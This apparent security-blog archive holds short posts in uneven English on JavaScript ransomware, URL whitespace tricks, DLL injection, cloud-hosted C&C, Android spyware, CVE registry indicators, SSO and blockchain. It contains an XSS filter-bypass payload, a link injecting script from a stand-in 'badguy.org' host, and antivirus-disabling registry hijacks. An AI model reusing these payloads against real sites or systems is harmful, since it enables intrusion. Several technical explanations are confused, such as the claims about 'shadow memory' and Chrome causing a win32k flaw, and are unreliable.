Category Archives: Application Development

Application Development

Infamous ransomware – another new generation was driven by JavaScript!

406 Comments

 

 

Have you heard the name evil? Seems this naming convention is apply to ransomware now. A simple hierarchic design of ransomware which work with Java script was born in 2017. The evil ransomware was written in 100% JavaScript. There is no visible panel used for decryption.

The designer of Evil (ransomware) looks familiar with forensic investigation. His design first approach to execute the task is going to delete all the executable file from the following folder.

  1. It delete all executable files from the (folder% TEMP% and% APPDATA% \ Microsoft \ Windows \ Start Menu \ Programs \ Startup) once (evil) javascript (file0locked.js) execute by wscript.exe.
  2. Execute command dir / b / s / x generate the file inventory list then save in encrypted format with naming convention 443.exe. Evil make use of ready make solution. Yes, it is a JavaScrypt (Browser-Based Cryptography Tools). JavaScrypt’s encryption facilities use the Advanced Encryption Standard (AES) adopted by the United States as Federal Information Processing Standard 197. JavaScrypt uses 256 bit keys exclusively.
  3. Key generation and encryption (Remark: below details is intended to provide concept for education only.

Encrypted extension:

*.doc *.xls *.pub *.odt *.ods *.odp *.odm *.odc *.odb*.wps *.xlk *.ppt *.mdb *.accdb *.pst *.dwg *.dxf *.dxg *.wpd *.rtf *.wb2 *.mdf *.dbf *.psd *.pdd *.eps *.ai *.indd *.cdr img_*.jpg *.dng *.3fr *.arw *.srf *.sr2 *.bay *.crw *.cr2 *.dcr *.kdc *.erf *.mef *.mrw *.nef *.nrw *.orf *.raf *.raw *.rwl *.rw2 *.r3d *.ptx *.pef *.srw *.x3f *.der *.cer *.crt *.pem *.pfx *.p12 *.p7b *.p7c

Hash sample: 1817853fdaf2d35988ca22a6db2c939e0f56664576593d325cfd67d24e8fb75c

Current status: 24th Jan 2017

No worries, most popular of antivirus programs are able to detect Devil ransomeware.

For example: Kaspersky,F-Secure,Symantec,TrendMicro. How about Mcafee. It looks that their signature do not have coverage.

Application Development

To be RFC 3986 or not to be RFC 3986

164 Comments

Heard that new discovered phishing technique can fool tech-savvy people. The bad guy conducted a technique so called white space in URL in cyber space. The objective is mislead the computer users includes savvy technical persons. But we are not going to focus how was hackers use phishing email compromise victim workstation in this article. But base on their hack technique raised of my reflections to address the white space fundamental issues. As we know, the white space in url alerted by RFC 1738 many years ago. The RFC 1738 has been replaced by RFC 3986. The concept were told that there is technical limitation of space character. On RFC 1738 article, it highlight that the space character is unsafe because significant spaces may disappear and insignificant spaces may be introduced when URLs are transcribed or typeset or subjected to the treatment of word-processing programs. Be my guest, let take a closer looks of this story.

Normally format HTML will have spaces in between them.

HTML

<nav>
  <a href="#">Peter</a>
  <a href="#">Paul</a>
  <a href="#">Mary</a>
</nav>

CSS

nav a {
  display: inline-block;
  padding: 5px;
  background: Red;
}

Output

What if the URI allowed to contain one or more space characters, is there any hesitation in this area? Do you think the hacker can utilize this invisible place to to do their bad things?

  1. A space position in the character set is 20 hexadecimal. The space character is unsafe because significant spaces may disappear and insignificant spaces may be introduced when URLs are transcribed or typeset or subjected to the treatment of word-processing programs.
  2. A space has to be replaced with a %20 instead. This makes the filename part of the URL less readable and, thus, makes people avoid it in the first place.

Example: whitespace hack

//Start HTML
<html>
<body>
<img/*comment*/src="javascript:alert('img tag')">
</body>
</html>
//End HTML

Result: Some script tags are allowed but <img src=”something”> is not. By replacing the whitespace with a comment, your code is accepted.

It looks that a reverse engineering can change a simple character to become a silent killer. Whitespace just means characters which are used for spacing, and have an “empty” representation. But whitespace jump into python world it will become a cyber weapon.The python community usually follows PEP8 style, which prescribes indentation of four spaces.Whitespace is significant in Python source code. From technical point of view, there are more room space let you guys develop more, right?

As said, whitespace can become a silent killer. However all depends on handler how to use it. He will become a accomplice. This week headline news report that Gmail Phishing Scam Stealing Credentials Through Infected Attachment. Heard that it involved whitespace in url. A space has to be replaced with a %20 instead. This makes the filename part of the URL less readable and, thus, makes people avoid it in the first place. I thought it also involves cross-site scripting technique. Below example quoted that one source is inserting code into pages sent by another source. Sound like OWASP Top 5 items, a cross-site scripting scenario.

<A HREF="http://Goodguy.org/search.cgi?criteria=<SCRIPT SRC='http://badguy.org/infection.js'></SCRIPT>"> Go to Goodguy.org</A>

 

Application Development, System

Descendant of VSAM File Organization,that is blockchain technology today

295 Comments

Old school boy might remember fundamental of Virtual storage access method (VSAM). I object, banking and financial institution are close with VSAM technologies day to day. Yes, they are using mainframe computer. For instance IBM S390. People discontentment of proprietary payment solution (SWIFT) sounds high! Hackers targeted payment system via the SWIFT, no significant figures show the security weakness of traditional payment system (SWIFT). Do you think the exploit come from fundamental design or it is the operation weakness? The block chain technology (bitcoins) carry out challenge to traditional payment method. For sure that it is a long run of competition. It includes intangible factors. Example: political, conflict of interest on business side, renovation of traditional payment culture,…etc.

Descendant of VSAM File structure,that is blockchain conceptual technology today

Blockchain technology – who is who?

Blockchain technology confusing me! What is bitcoin blockchain? Or it is Ethereum technology? But heard that there is another digital currencies or digital token. Oh! my god, still have smart contracts! Find the answer conclude that it is list of transactions that is replicated across a number of computers.

i. Blockchain keep track of a currency’s balances.Since it is a decentralized networks, blockchain does not have a central point of failure and is better able to avoid malicious attacks.

ii. Ethereum is an public blockchain-based distributed application platform featuring smart contract functionality.

iii. A smart contract is a digitally signed, computable agreement between two or more parties. A virtual third party work as software agent to execute and enforce at least some of the terms of such agreements.

iv. Digital tokens being used to represent different assets on a blockchain.

The overall opinion of people feel that BlockChain technologies are advanced compare with traditional payment method. See below diagram, the layering architecture of blockchain not special. If you take a closer look and focus in blockchain and share data storage layer. You will feel that blockchain design concept like IBM Mainframe VSAM file organization structure.

From design point of view, VSAM structure consists of tables, columns, primary keys, indexes, stored procedures, and views (refer to below left hand side diagram). When a direct READ is performed for a VSAM indexed file, based on an alternate index for which duplicates exist, only the first record in the data set (base cluster) with that alternate key value is retrieved. You need a series of READ NEXT statements to retrieve each of the data set records with the same alternate key.

How about block chain design structure? The terminology so called terms includes Transactor, Transaction, Ledger,World stat, Chaincode, Validating peer, Non-validating peer, Consensus and Permissioned network (refer to below right hand side diagram).

Descendant of VSAM File Organization,that is blockchain technology today.

Blockchain Key terms (copy from IBM Bluemix Docs)

The following terms are instrumental in gaining a holistic understanding of blockchain concepts:

Transactor: A network participant connected to the blockchain network through a node, who submits transactions from a client using an SDK or API.

Transaction: A request by a transactor to execute a function on the blockchain network. The transaction types are deploy, invoke, and query, which are implemented through the chaincode functions set forth in the fabric’s API contract.

Ledger: A sequence of cryptographically-linked blocks, containing transactions and the current world state. In addition to data from previous transactions, the ledger also contains the data for currently-running chaincode applications.

World state: Key-value database used by chaincodes to store their state when executed by a transaction.

Chaincode: Embedded logic that encodes the rules for specific types of network transactions. Developers write chaincode applications and deploy them to the network. End users then invoke chaincode through a client-side application that interfaces with a network peer, or node. Chaincode runs network transactions, which if validated, are appended to the shared ledger and modify world state.

Validating peer: A network node that runs the consensus protocol for the network to validate transactions and maintain the ledger. Validated transactions are appended to the ledger, in blocks. If a transaction fails consensus, it is purged from the block and therefore, not written to the ledger. A validating peer (VP) has authority to deploy, invoke and query chaincode.

Non-validating peer: A network node that functions as a proxy, connecting transactors to validating peers. A non-validating peer (NVP) forwards invocation requests to its connected validating peer (VP). It also hosts the event stream server and the REST service.

Consensus: A protocol that maintains the order of blockchain network transactions (deploy and invoke). Validating nodes work collectively to approve transactions by implementing the consensus protocol. Consensus ensures that a quorum of nodes agree on the order of transactions on the shared ledger. By resolving any discrepancies in this order, consensus ensures that all nodes operate on an identical blockchain ledger. See the consensus topic for more information and test cases.

Permissioned network: A blockchain network where each node is required to maintain a member identity on the network, and each node has access to only the transactions that its permissions allow.

For readers who are interested of block chain technology. Please refer below url for reference.

About blockchain (IBM Bluemix Docs)

https://console.ng.bluemix.net/docs/services/blockchain/ibmblockchain_overview.html

Merry Christmas!

Application Development, System

Do you think 64 bit OS can secure critical facilities in your country?

191 Comments

Few years ago, heard that 64 bit version of windows is more secure. Expert was told, 64-bit operating systems aren’t immune to malware but security features are stronger.

Address Space Layout Randomization – incorrect guess may result in the program crashing

Mandatory Driver Signing – prevents unsigned drivers provided by malware from running on the system

Kernel Patch Protection – prevents device drivers from patching the kernel

Data Execution Protection – DEP allows an operating system to mark certain areas of memory as “non-executable

It looks that above 4 items of feature capable to protect the OS system infected by malware. Recall cyber incident history, 1st version of the Stuxnet computer virus that was used to attack Iran’s nuclear program in November 2007, being developed as early as 2005, when Iran was still setting up its uranium enrichment facility. SCADA system compatible with windows 32 bit and 64 bit OS. SCADA manufacturer strongly recommend to use 64 Bit operating systems. The 32 Bit operating systems may be used for compatibility reasons within already existing configurations. Seems we can figure out hints of malware weakness. And speculate that Stuxnet virus infect the SCADA system are run on top of windows 32 bit operating system (OS) instead of 64 bits.

Descendant Of The Malware – embedded new DLL injection technique (reflective DLL injection)

A more sophisticated of DLL injection method, so called reflective DLL injection. It loads code without calling the normal Windows API calls, potentially bypassing DLL load monitoring. Conceptual diagram shown as below:

Above reflective loader function will find the following target:

  • Process Environment Block (PEB) of the target process
  • suitable CPU register
  • the address in memory of kernel32.dll
  • and other required libraries

Next step: Find the memory addresses of required API functions such as LoadLibraryA, GetProcAddress, and VirtualAlloc. Relies on these API functions to load the DLL (malware) into memory and call its DllMain entry point.

Remark: What is DllMain Entry point – An optional entry point into a dynamic-link library (DLL). When the system starts or terminates a process or thread, it calls the entry-point function for each loaded DLL using the first thread of the process. The system also calls the entry-point function for a DLL when it is loaded or unloaded using the LoadLibrary and FreeLibrary functions.

In the DllMain function, you can perform only a very limited set of actions. The thing is that some DLL may be not loaded yet, and you cannot call functions from them.

Does it mean that the 64-bit operating systems not easy to implant malware?

All applications except malware would use the standard main memory. The copy (shadow memory) is designed to be used by malware. Shell code might have difficulties to pass though parameters on shadow memory space. The fact is that there are differences between x86 and x64 operating system. The 64-bit addressing capability and a flat set of 16 64-bit registers for general use. If that “shadow space” on the stack was not allocated by the caller, the function may not work as expected.

Remark: In 64 bit OS environment, the allocates pages in the shadow region on demand. That is only when page contains tag information. As every byte of tracked program data need four more bytes for its tag, part of the physical memory footprint of a process increase by a factor of four.

Speculation:

Believe that nuclear power facility still have 32 bit SCADA application in operation. But no harm to keep, the fact is that even though you upgrade to 64 bit OS. It is hard to guarantee you can avoid malware silently implant to your environment.

Below url is the malware attack nuclear power facilities historical information for your reference.

https://www.google.com.hk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwj72tfKnN_QAhVIGpQKHTdgBywQFggaMAA&url=http%3A%2F%2Fwww.antihackingonline.com%2Fnetwork-protocol-topology-standard%2Fmalware-vs-nuclear-power-do-you-think-scada-system-is-the-culprit-of-attack-on-nuclear-power-system%2F&usg=AFQjCNGDNhe7wFJgFQSDK7V3QDnWqiB99A

 

Application Development

Next Generation C&C – Google docs

167 Comments

Malware C&C server looks exposed to security vendor for a period of time. Hacker have difficulties to implant malware to workstations once malware detector install (layer 3) network backbone routing area. Sure that Hacker won’t be announced defeat then such a way disappear forever.

A smart way utilize cloud resources

We understand that cloud computing uses HTTPS by default and the data transmission over SSL. What if hacker re-engineer their malware system structure. Utilizes the cloud farm belongs to victim, storing the command-and-control (C&C) function and malicious code inside the cloud. As we know, traditional defense mechanism lack of visibility into SSL crypto setup. But It becomes a huge benefit to hacker. How worst situation you can imagine on this scenario.

How Google Docs in Google Drive re-engineer as bad guy gatekeeper.

May be you will say, it is a outdated news. The similar of cyber attack happened on 2012. But hacker never give up! They improve this technique in silent. The hacker use Google Drive as a relay. The concept is going to utilize Drive Proxy. Drive Proxy is a Windows Service that streamlines communication with Google Drive. It uses a simple protocol to communicate with client applications over a pipe. Similar idea of hack concept announced by Black Hill information security on Aug this year. They provide proof of concept to show this method is feasible.

Below infographic can provide similar idea to you in this regard.

For more detail of Google Drive proxy, you need setup a Google API project in the Google Developers Console. For more details, please see below:

  1. Go to: https://console.developers.google.com/project
  2. Click on “Create Project”
  3. Name your project and click on “Create”
  4. Wait for the project to be created.
  5. From the left hand side menu, click on “APIs & auth”.
  6. From the left hand side menu, Click on “APIs”
  7. You will need to enable the “Drive API” by toggling the switch to “on”
  8. From the left hand side menu, Click on “Credentials”
  9. Click on “Create new Client ID”
  10. Select “Installed application” and click on “Configure consent screen”
  11. Fill in the details for your consent screen and click on “Save”.
  12. A new form will be presented. Select “Installed application” and “Other” then click on “Create Client ID”
  13. You will be presented with a Client ID and Client Secret.
  14. Switch to the root of the git repository and using a text editor, open ProjectConfig.txt
  15. You will see a line “ClientID <Your application google id here>”. Replace “<Your application google id here>” by the Client ID in the developer console.
  16. Example: “944352700820-eh520uo159llp750lf9jmn6srcm35r3j.apps. googleusercontent.com”.
  17. You will see a line “ClientSecret <Your application google secret here>”. Replace “<Your application google secret here>” by the Client Secret in the developer console.
  18. Example: “BfI0jTaVzBAuRo9odDmheM2Z”
  19. You will see a line “UpgradeCode <A GUID to identify your project here>”. Generate a GUID and replace “<A GUID to identify your project here>” with the generated GUID.
  20. Example: cb1ed02a-7233-4a67-a9f7-ad10a42a2082
  21. You will see a line “Company <Your Company name here>”. Replace “<Your Company name here>” with the company name you wish to appear in the “Add/Remove programs” window’s company column for Drive Proxy’s entry.
  22. Example: “Initech, Inc.”
  23. You will see a line “CompanyPath <Your Company here, must be a valid Windows folder name>”. The installer will install to “%programfiles%\ CompanyPath\Drive Proxy Service”. Replace “<Your Company here, must be a valid Windows folder name>” with the folder name under which you wish to group your programs.
  24. Example: “Initech”
  25. You can then open DriveProxy.sln and compile the Installer project.

Happy Thanksgiving Day

Application Development, Cell Phone (iPhone, Android, windows mobile)

Android mobile phone user alert! AdUps software,he is a voyeur!

178 Comments

Technical writer (Miss Swati Khandelwal) write a technical article alerts Android users around the world they are under cyber attack. What’s going on? It seems that a suspicious software bundle with mobile phone (ZTE and Huawei) together export to US market. The goal is going to collect the mobile phone data. The data includes SMS texts, Send call logs, end user personally identifiable information, geolocation information to their server. Oh Jesus, US Government with high visibility statement let’s the citizens know they are under surveillance. A open method of NSA is use a tool so called “XKEYSCORE” for real time monitoring (internet activities). Who’s is the party jump over the queue of NSA to do cellphone tracking and Intercept action? A security firm found that the data collection server is located in China.In the mean time it is unclear whether the data is being collected for advertising or other purpose?

Can we uninstall the software?

Yes, it is possible to remove those applications. There are two preload packages of malicious system application (com.adups.fota.sysoper and com.adups.fota) on Android phone. Android’s package manager has commands to get rid of this stuff. For this, let’s become root.

pm disable com.adups.fota.sysoper
pm uninstall com.adups.fota.sysoper
pm disable com.adups.fota
pm uninstall com.adups.fota

The pre-installed apps are located in the following area:

/system/app/
/system/priv-app/

But we are not the Android programmer or security Expert. Seems it is not easy to execute above job on your mobile phone. Do you think what time does the manufacturer release the patch ?

Related articles (headline news)

http://www.foxnews.com/tech/2016/11/15/secret-software-in-some-android-phones-sent-data-to-china-experts-warn.html

 

 

Application Development, System

CVE-2016-7255 – Google Chrome is the Instigator

248 Comments

IT world encounters Storm in a tea cup from weekly. Heard that Microsoft blame Google mistaken on their web browser (chrome) design mistake causes vulnerability occurs (CVE-2016-7255). On hand information described that hacker would like to find back door in web browser (Google chrome), they found a privileges escalation at the end. It looks that similar vulnerability caused by web browser will be happened in future. The vulnerable service daemon is the win32K.sys this round!

What is win32K.sys – It is a multi user win 32 driver file.

It looks that win32K.sys has design limitation, a page_fault_in_nonpaged_area discovered in 2009. But what is page fault in non page area? The symptom is that application asked for a page of memory in order to continue, and the page was not available then crash.

Suspected that why google chrome is the instigator

When Chrome attempts to access critical data from memory that was supposed to be stored in the Non-Paged area, but cannot find it. Because this area of memory is reserved for the Windows core.

Below windows OS register keys relate to CVE-2016-7255

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe “Debugger” = ‘svchost.exe’

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe “Debugger” = ‘svchost.exe’

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Exp.CVE-2016-7255

    HKEY_LOCAL_MACHINE\SOFTWARE\

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings “WarnOnHTTPSToHTTPRedirect” = ’0′

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings “WarnOnHTTPSToHTTPRedirect” = ’0′

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore “DisableSR ” = ’1′

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe “Debugger” = ‘svchost.exe’

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe “Debugger” = ‘svchost.exe’

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “3948550101?

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “xas
    
    HKEY_CURRENT_USER\Software\Exp.CVE-2016-7255

Comment:

CVE-2016-7255 hit design limitation and causes local privilege escalation. Patch is available. But my comments this time is wait for next round of announcement by Microsoft. What’s the reason? …….!!!!!

Application Development, Cell Phone (iPhone, Android, windows mobile), Network (Protocol, Topology & Standard), System

Is Single Sign on a Security Risk?

208 Comments

Is Single Sign on a Security Risk?

The majority of computer operators and people alike maintained one user ID and password. The single sign on facility fulfill their operation requirements. From security point of view, there are inherent risks for company deploys single sign-on function on their network infrastructure.

Single sign on infrastructure

Let take a closer look of single-sign on

Benefits:

  1. No need to remember many user IDs and passwords
  2. Simplified operation procedure
  3. Improves the effectiveness/timeliness of disabling all network/computer accounts for terminated users.
  4. Reduces the time taken by users to log into multiple applications and platforms

 

Single-sign on drawback

  1. Same password on all your various web services, it is also dangerous to let one username/password combination unlock all the resources.
  2. Single high-value target (attracts more attackers)
  3. Side channel attack against authentication step
  4. never know how secure your system is or if there is a breach

Single sign on increase the difficulties of application protection

SSO by itself doesn’t really improve security and, in fact, if not deployed properly can degrade security.  There are more techniques to attacks single sign-on application today. For more details, please see below:

  1. Single Sign-On phishing
  2. SSO profile was vulnerable to a Man-in-the-middle attack
  3. Replay Attacks
  4. XML Signature Wrapping vulnerability in SAML protocol

Security Concerns:

GIAC as a pioneer point out single sign on security concerns on their global information assurance certification paper. The article bring an idea to the world that each operating system and application has it own set of security requirement for both user user ID and password. In the sense that SSO by itself doesn’t really improve security and, in fact, if not deployed properly can degrade security.  Since enterprise firm need compliance, fulfill audit requirements. Please be noted that compliance may not equal security. Let’s think it over, one single password that could access all key applications. Does it on a security risk?

Application Development, Cell Phone (iPhone, Android, windows mobile), System

Android bad luck this year! Do you think iPhone is Invulnerability?

175 Comments

Keep heard that vulnerability found on Android phone recently. For instance Dirty Cow attack, Drammer attack and Dangerous Pork Explosion backdoor. Do you think Linux operating system not secure anymore?

As far as I remember vulnerabilities found on Apple IOS not less than Android operation system. Can you imagine in what circumstance, XNU (X is Not Unix) can be compromised by hacker. iPhone architecture and its main components. The architecture uses the Darwin operating system, which includes the XNU kernel and system utilities.

What is XNU?

Darwin is an open source operating system released by Apple in 2000. Apple then built upon Darwin to create OS X and iOS. XNU is the computer operating system kernel developed at Apple Inc for use in OS X and iOS. XNU was a hybrid kernel combining version 2.5 of the Mach kernel developed. The components from 4.3BSD and an Objective-C API for writing drivers called Driver Kit. Up to 2016 iOS version details shown as below:

iOS has many similarities as Mac OSX on kernel components and functions. As mentioned, XNU was a hybrid kernel combining version 2.5 of the Mach kernel developed. In the kernel there are three important components. They are Mach, BSD and IOKit.

  •    Mach: Low level abstraction of kernel
  •    BSD: High level abstraction of kernel
  •    IOKit: Apple kernel extension framework

All the classes have a root object, called OS Object. OS Object mainly overwrite new operator to allocate memory, and declare init method to initialize the object self. Because of this fundamental design, few known vulnerabilities are happened in this area. An application may be able to execute arbitrary code with kernel privileges. Do you think iPhone is invulnerability? No, sure properly not. Found high level of risk vulnerabilities last few month (2016). Seems headline news not intent broadcast in high profile and therefore not to seriously shocks iPhone fans. For more details, please see below CVE for references:

  • CVE-2016-4778: The kernel in Apple iOS before 10, OS X before 10.12, tvOS before 10, and watchOS before 3 allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.

Remark: Impact – An application may be able to execute arbitrary code with kernel privileges

  • CVE-2016-4777: The kernel in Apple iOS before 10, OS X before 10.12, tvOS before 10, and watchOS before 3 allows attackers to execute arbitrary code in a privileged context or cause a denial of service (invalid pointer dereference) via a crafted app.

Remark: Impact – An application may be able to execute arbitrary code with kernel privileges

  • CVE-2016-4738: libxslt in Apple iOS before 10, OS X before 10.12, tvOS before 10, and watchOS before 3 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

Remark: Impact – Processing maliciously crafted web content may lead to arbitrary code execution

Xcode is a development environment which contains a suite of software development tools for the creation of OS X, iOS, WatchOS and tvOS software

  • CVE-2016-2315: revision.c in git before 2.7.4 uses an incorrect integer data type, which allows remote attackers to execute arbitrary code via a (1) long filename or (2) many nested trees, leading to a heap-based buffer overflow.
  • CVE-2016-2324: Integer overflow in Git before 2.7.4 allows remote attackers to execute arbitrary code via a (1) long filename or (2) many nested trees, which triggers a heap-based buffer overflow

Current summary:

Due to business requirement, life cycle of products become short and such a way shorten product development life cycle & test cycle. It is a joke!

Application Development, Network (Protocol, Topology & Standard), System

Part 1:Blockchain technology situation – A Tales of Two Cities

200 Comments

 

Quotes from A Tales of Two Cities

“It was the best of times, it was the worst of times,.. Charles Dicken

Read the fiction from my view point looks boring, however a famous quotes written by Charles Dicken can correctly describe the current situation of Blockchain technology.

It was the best of the times

Blockchain technology appear to the world cope with electronic currencies. The proprietary payment method covered up financial world long period of times. As a consumer you are not going to pay high rate of services fees for transfer payment method , right? The blockchain technology (crypto currency) appears like a sunrise to everybody.

Traditional payment transfer (SWIFT) vs Blockchain technology

The traditional payment transfer need for central authorities to certify ownership and clear transactions (see below diagram for reference)

Blockchain technology – decentral data storage

In a blockchain network the data is stored on many computers (miner). Each computer interconnect the other computers (nodes) in the blockchain network. The information on all these computers are constantly aligned.

Blockchain is a bitcoin wallet and block explorer service. From general point of view, it confer benefits on society. Transaction fees are voluntary on the part of the person making the bitcoin transaction, as the person attempting to make a transaction can include any fee or none at all in the transaction.

Economic Benefits: In the meantime bitcoin did not have high economic benefits.

Business development opportunities: Block chain concept lure entrepreneurship bring up new business idea. Their objective is going to break the ice. Make the electronic payment more open.

It was the worst of times!

Hacking looking for ransom not possible occurs since law enforcement team trace the finger prints can find out details. Bad guy aware that he will under arrest during money clearing process . Therefore they are not intend to ask for ransom until crypto currency (bitcoin) appears. It looks that bitcoin feature lure hacking activities in serious. For instance triggers ransomware infection scare IT world. Law enforcement team (FBI) did not have solution in this regard!

Observation: Why does bitcoin feature lure hacker interest?

The realistic were told that Bitcoin exchange operation and policy visible level are low. Yes, they are make use of blockchain technology, however the governance structure not equal to common financial institution. The incidents occurred so far look lack of visibility! See below historical incident records (thefts from Bitcoin exchange) might bring an idea to you.

Thefts from Bitcoin exchanges

Aug 2016 – Hong Kong base Bitcoin exchange (Bitfinex) hacked : drained 119,756 bitcoins from its customer accounts

June 2015 – Scrypt.CC (Bitcoin exchange): Undisclosed sum stolen

May 2015 – Bitfinex (Bitcoin exchange): incident of lost 1,500 bitcoins value US$330,000

Mar 2015 – Coinapult (Bitcoin exchange): incident of lost 150 bitcoins value $43,000

Remark: Hong Kong monetary authority enforce Hong kong financial institution includes bitcoin exchange business vendor mandatory execute their guideline. For more details, please refer to regulatory requirements such as HKMA(TM-E-1, TM-G-1, TM-G-2, SA-2).

Level of Trustworthy – cryptocurrency (Bitcoin)

Aug 2016 – US Marshals to Sell US$1.6 Million in Bitcoin at Auction.

Regarding to the above auction by US government. Do you think it equivalent that US government gave blockchain technology as a untrust vote?

Cyber security viewpoint - Blockchain vs. SWIFT

Famous quotes:

The guillotine, a machine designed to behead its victims, is one of the enduring symbols of the French Revolution. In Tale of Two Cities, the guillotine symbolizes how revolutionary chaos gets institutionalized.

Swift bangladesh heist cause a sensation. Let’s finance institution heads up. Bring their attention to end user computing. Whereby a continous information security program and policy announced. But you might have question? How SWIFT manage to fight it all? That is unknow system vulnerabilities on their system?

Blockchain technique – every transfer of funds from one account to another is recorded in a secure and verifiable form by using mathematical techniques borrowed from cryptography. From technical point of view, it is a tamper-proof technology. Why was bitcoin exchange Bitfinex hacked (Aug 2016)?

The cyber incidents encountered in blockchain and traditional payment (SWIFT) hints that a weakness of fundamental design (see below)

 

 

Refer to above diagrams, a common criteria occurs on both traditional payment and blockchain solution. No matter how secure on your payment method, a single point of failure on single element will crash your tamper-proof design. For instance, a vulnerability occurs in sender or receiver workstation OS level, malware can compromise the whole solution. Even though you are using advanced crypto solution.

Next topic we are going to investigate bitcoin malware. Coming soon!